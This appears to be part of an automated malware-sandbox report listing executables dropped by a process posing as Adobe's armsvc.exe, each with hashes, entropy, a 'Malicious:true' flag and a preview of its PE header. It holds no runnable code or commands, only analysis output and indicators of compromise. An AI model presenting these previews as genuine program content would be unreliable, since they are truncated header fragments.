                                                                                                                                                        SSDEEP:24576:Tg5FvCPcsU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kfHzLNiXicJFFRGNzj3
                                                                                                                                                        MD5:B721C77B92D008F4112FCA765F527776
                                                                                                                                                        SHA1:32D2F029156EA2740B89C4D9328254B584CD0DEC
                                                                                                                                                        SHA-256:8AEF745650672CBF8891DA402EA6078DCBCC62A673BEACB8663AB42A55579EAE
                                                                                                                                                        SHA-512:E4D9E25D9B3731DD4B960A0276DAF2309A2F8B980E6A1FB408F15CDD6F9D782D97AC91A0B78F563572B6CD4721FE56115709E02891BDD8032AF161522CA690DF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@..............................!.....M..... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                        Entropy (8bit):7.20018081560689
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ajKTIsAjFuvt9fmFthMaT5U8aChaeu6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ajI/mPh7TT797LNiXicJFFRGNzj3
                                                                                                                                                        MD5:4F7D4CFF6A26494C256D9C3DCECD9AB5
                                                                                                                                                        SHA1:F06C44240901DC215DB91FFD922B5EE7C7277943
                                                                                                                                                        SHA-256:5348250A135885A1271F7200AC44EF4259D2622967097E32740700B02325C653
                                                                                                                                                        SHA-512:C08AEA6DE378D0A5F5FA27EC8B87599960C76D403C7A38192627D091D7F52E72AA65D52748EB27C73370C244A6E0CB0115B5A045886B56B000A39AE42782791D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1671168
                                                                                                                                                        Entropy (8bit):5.004949112814649
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:WGqVwCto1Om5WgG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jZ1OmUZLNiXicJFFRGNzj3
                                                                                                                                                        MD5:6900B2266CD080911A66E405A72E72FE
                                                                                                                                                        SHA1:5931E9D1BBB1ECC63F97A24C107168E1F3BAC85D
                                                                                                                                                        SHA-256:5F75B90A24F97403C96CA9FCDAFB34810999220B031C45C4ABC68DB8E5E052CE
                                                                                                                                                        SHA-512:89AD4E15F102D853A633B49417D3426A07E146443067EA432D0FA76EBE08E28B3A96EAA5FE914EC1D8E4C0810229D452B77E195A9214958CEF7293F5A8059686
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................$........... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...`...0......................@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1409024
                                                                                                                                                        Entropy (8bit):4.686404387507091
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:oWBWA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:bLNiXicJFFRGNzj3
                                                                                                                                                        MD5:DAB52F964A1B2A909EFE9BB4CB998FA9
                                                                                                                                                        SHA1:FEE37972C11A83D663095D4F6CA5F6CD9CF74848
                                                                                                                                                        SHA-256:273F11651083317BB6083552A13A0DFA9200EE3A2649AEC63BE74DFE78E420ED
                                                                                                                                                        SHA-512:7D1537C6C3EB50042A34B2E6233069A875267F51B996B4A3986D47C4A3C6B8F2889EA433542DC452EB0CEEC40886B74D6DDDAC5EC8E1C9BA7452EC08B59AFCBA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................p .......... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                        Entropy (8bit):7.221670437105595
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:v+GtCi27mVdyT+a0tLNiXicJFFRGNzj3:Gmd27g7wRGpj3
                                                                                                                                                        MD5:973F6FC9ED327D84649BD444B78D555B
                                                                                                                                                        SHA1:76B0EC777A04270C3A8C72EF0AE36572D3767AC5
                                                                                                                                                        SHA-256:ECD6C73C9E72FB9B034AA122112698A19FC757B1D35B05302BB76531485834C0
                                                                                                                                                        SHA-512:1AA29FF70FCF5CAC6AC1D27EFA8EC2189BCCA897EF91EE50FF7683488C18535B0AA8FF2B0918208FE3094ECDC2581EFB78949D3E0F987A9437F795FA057B0658
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3110912
                                                                                                                                                        Entropy (8bit):6.646858590707099
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:ZU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYOLNiXicJFFRGNzj3:O9NfHOIK5Ns6qR9w7wRGpj3
                                                                                                                                                        MD5:EA145602AFAE4BFB96322AA13725A3E4
                                                                                                                                                        SHA1:51D6FE3209E478AE3CEC527E4B0926C2DFE79721
                                                                                                                                                        SHA-256:AFA1400142ACD230379A24C670CF6E3E59C9E46B7863257CCECF93484388A1DB
                                                                                                                                                        SHA-512:C4191DD47B692A43DCCB0142546DFADF4CA3761F114DC2E7483D132C284D93CC2C1847472AF6D0BBD25D4A68D1BF7ECB1194E39DACCA6D8423DFB242EB0D367B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......u0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1743872
                                                                                                                                                        Entropy (8bit):5.136830554575582
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ekIWTUQcyd2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:exKUlLNiXicJFFRGNzj3
                                                                                                                                                        MD5:0E4D448EA8CD59E2BFC076513EEBD403
                                                                                                                                                        SHA1:3BE5A1362AD44281E79AE6909A2C214C45026A09
                                                                                                                                                        SHA-256:6883E6A07323E25B63E538C41EACB0AEA3CCDBAD76148D67E24747CDCC67A4CC
                                                                                                                                                        SHA-512:FA917E26E131270530A855A0074686A2FC40BFBF8295E980E605F7ED8D03AF8F5CFFB1D36A16F7CDB9D9285CBFE5DF11D6218BCCE54F3E465D131A4AE87C3A6B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@..............................%........... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...p...@......................@...................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1494016
                                                                                                                                                        Entropy (8bit):4.896109948998606
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:PO+qB9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:m+qLNiXicJFFRGNzj3
                                                                                                                                                        MD5:19196B586C6A76878BA0865598BE21B0
                                                                                                                                                        SHA1:8402A4A230F3FC7FBF2CEE1E33301A444F0319AE
                                                                                                                                                        SHA-256:EBB4486707678EF0986E6330A7BEFFF81C988AB1E5F55AFEBA6759E59CD96904
                                                                                                                                                        SHA-512:A846958491B5C116B0E5D220D67A18497A25979A5425C2D44C3703B9F09A8EA75BF0637B5303A5B63DDB1FC0ED62FE598AC3F3C1D41C6E57CF861522854B3546
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@...........................!.....R{..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1298944
                                                                                                                                                        Entropy (8bit):4.521149824851535
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:GiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:w/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:3141705C32670AB16C799E67BECFAA2F
                                                                                                                                                        SHA1:CC50F0619020642CCA5FC4049F92BD0BF3874FD3
                                                                                                                                                        SHA-256:D36D9B878A53AE822A53535732BE2510F6B95F7121EB50B072A2750E62DCAF95
                                                                                                                                                        SHA-512:9A0739B8F90A0ABED12646D2BE2BAC56C4C1508A3E559020A605875221B868EF2C55B63BD839AC0C313BB8C154DC71E2DBCCF240868F48530727E0AC38AF3AFD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.....................................A.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...`...........2..............@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1317376
                                                                                                                                                        Entropy (8bit):4.550840272629544
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:qviJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:k/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:B37CFD7E579843DC962C5B33B4ECD984
                                                                                                                                                        SHA1:077385C85BCE66E36EA872B5D45E8DDE928B0A2F
                                                                                                                                                        SHA-256:C5B036292713F215EB0A031D463E589155492357AAB804E8F336FB6C07546423
                                                                                                                                                        SHA-512:B0152CA6AC56C626DF21BA93A457A104DD9C33FCE4ACC50CEDACB116199463909A8F94DBE8FE9398470E460D452F3697BA1714D4E77277475CD2868EEEC277B3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...`...........z..............@...........................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                        Entropy (8bit):6.496760204746329
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:MtuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755ULNiXico:MjEIa3HIEWOc5u7wRGpj3
                                                                                                                                                        MD5:4CB8AD859AA148FB9611F769C7D8C3B8
                                                                                                                                                        SHA1:6D34275ABB66B29A65B31FB01313863335DB40EB
                                                                                                                                                        SHA-256:22EDFE928B3F803811ACC074FAF61FDE7C6CDD98F857DCC6F50227A573224E91
                                                                                                                                                        SHA-512:7F225BA651698BFE07DD2CEFAB9B386C70455E1D45F776AF7C71C80822CCA9800681F077E3418FDE4C95EF5DC3A120B84B690C00506FF4162104F13AD601D6A5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......n?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                        Entropy (8bit):7.999353914341245
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:1572864:IQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:HXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                        MD5:DCDF5A96732E4F8C2B76934CF7F07B4A
                                                                                                                                                        SHA1:E4B7E1205FC9ADDA3A3265A25BA20FA562DB4BAC
                                                                                                                                                        SHA-256:02DEE64570E4643CAD2372B1647E14EA9F2B0DFBFA15044DE2B847CF9F6B51C6
                                                                                                                                                        SHA-512:4E4556B3F96DC1D521A587CC2DC0009BC9A36FB82640627A0FB83C129D7F8A1443817EF11D3FE8B2F02EFEAA64D26550E57DE1A8E70841521F5200C490B95F05
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1385984
                                                                                                                                                        Entropy (8bit):4.703445945770525
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:QjkYup/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:k/upLNiXicJFFRGNzj3
                                                                                                                                                        MD5:B635123E311C5F5FFD2E9F30021B99CB
                                                                                                                                                        SHA1:D852E2581A68D1277D232D3990DEAD78CCC2F603
                                                                                                                                                        SHA-256:D11F29F0BADB43AD582620A14815ADAA22E1343C4130BB44A7E0E9E758197C1B
                                                                                                                                                        SHA-512:119D5B2F5EBB7C578A442D29C3BA1C415FE67E195888C19E214C45816A7B1328712F55C8333117A3CCFEE1C92F14BD8A2515F09897A4D5EF4B41AC7BCCBD3791
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... ......y.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1540608
                                                                                                                                                        Entropy (8bit):4.934995309786012
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:mxwSJzkrmZs1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:myIkrKs1LNiXicJFFRGNzj3
                                                                                                                                                        MD5:9944FF7F3D810BBABBA682E13D8A5CB9
                                                                                                                                                        SHA1:F5423C53FB9B2D7F6315AF7D81B68162BE09283E
                                                                                                                                                        SHA-256:9E0DD18DBEB908CB90210D1CDB07B87411251AE785C6FB1459EAB721BA9C7307
                                                                                                                                                        SHA-512:6D1F91938610C35AD23414691FCFC5C24B2394B80AE4CD5E861E6EF03699811E20F8BB005C37C26011E0910681B9D13D00228B4ADAFA292378A8317CB1581F37
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.............................."........... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1804800
                                                                                                                                                        Entropy (8bit):5.247476300619326
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:iHQJLIRZvsnN4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:iHQJLy44LNiXicJFFRGNzj3
                                                                                                                                                        MD5:F580C2873A3B0C2DC9215374287EE476
                                                                                                                                                        SHA1:C5BF92C25CEE9B6782ABF92F9768F5AFE9FD175F
                                                                                                                                                        SHA-256:982EAE0857190EED70376E1DFD5726F501AD50613CFA60AD632E1944CD6E685D
                                                                                                                                                        SHA-512:A0040BE5F54B4CE6AD8C7F72F3ED0C2C56688C26819E36816C33EAB74BDB84CBCB011CD4149CA45ED3FDCFE5808163AD7574B9F18C5A8240746705A36BD5586C
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&........... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5365760
                                                                                                                                                        Entropy (8bit):6.447933067176808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:cUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1k2:XWmXL6DE97dRpKuoQbgv7wRGpj3
                                                                                                                                                        MD5:5CE6A7A3B99D4D9B2A2EE9C847523A0B
                                                                                                                                                        SHA1:360D5069AA60113E40C00E2D55A02A14DCD12593
                                                                                                                                                        SHA-256:5EBCFDAA0525B3411AC6A5BD9AEB0FB51748E2CC4B09F662EDCDA384411C31FC
                                                                                                                                                        SHA-512:F9683531ED544AC21D55B4080A7A94B12B1BBB5382FDE9AEAB7C14988E47BCC23CDA88319A2627FD2671B8D7DDC589A07B9FB6FF2728C34D692017014295B4F3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3163136
                                                                                                                                                        Entropy (8bit):7.971279028973012
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:3rZ23AbsK6Ro022JjL2WEiVqJZ07wRGpj3:7JADmmxL2WEoCZgF9
                                                                                                                                                        MD5:CB6A981FDCAAC7B9D5B3C1B47AF89F01
                                                                                                                                                        SHA1:3EDA05B24E4FE175A7356932FA923EF2AA3F3402
                                                                                                                                                        SHA-256:6A2D3E32C7FDFBAF3DD3FD1AA76EBD80E18E2BD935374FD12C7655B3A8EFD0A9
                                                                                                                                                        SHA-512:E2CDB2CC3488B1AB4A9D584F816DDFF71C102675DBF40696D76B87D537ECB29BFAC767A082A986A68B88D54249DFD0C1DB0739AA63DD8B0F8D5C7C75818B77E8
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1213440
                                                                                                                                                        Entropy (8bit):7.194619219192025
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:9frYY42wd7hlOE9fpkEE64F/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:w/9xrSFLNiXicJFFRGNzj3
                                                                                                                                                        MD5:4F085CBE4992DEF65497276EA8FB03FB
                                                                                                                                                        SHA1:543B388FC243F38EA85F3BA50857E0105AA21BF2
                                                                                                                                                        SHA-256:B01C4AA43B646A871322A10C5DEC42E0BCC2DFFC58DA3B770DDED111908BA847
                                                                                                                                                        SHA-512:AC1BCBEB1ECBB1047C0E97986DF238C38B7A6543584BE56761FF7C53E408A0614829D3C9CFD2822B60FB7DA66DD4EE9B67093B7C3BF7A9B8B544CA1EC25F6411
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......s.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1544192
                                                                                                                                                        Entropy (8bit):4.836091598196414
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:zzNKU/5u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zzNr/5uLNiXicJFFRGNzj3
                                                                                                                                                        MD5:99674174CBB87800FA9F7B985E4FE3A4
                                                                                                                                                        SHA1:B40623D24FDD100D91926C796921E2F9FD09D6EF
                                                                                                                                                        SHA-256:EF24E8AA4CB8B0EC0F58E142DD884660A0CF7C609D53231F1FBE568D1BF89889
                                                                                                                                                        SHA-512:0D4E034092B1B0FE63FFE8BC5AEE51A4DA9DD20C7DB2DE39F3050BC794AEB3A090901B12B6B16BF66E39BECF734F0794EF6F587018FCE2D782A514E1CD0B5BEE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
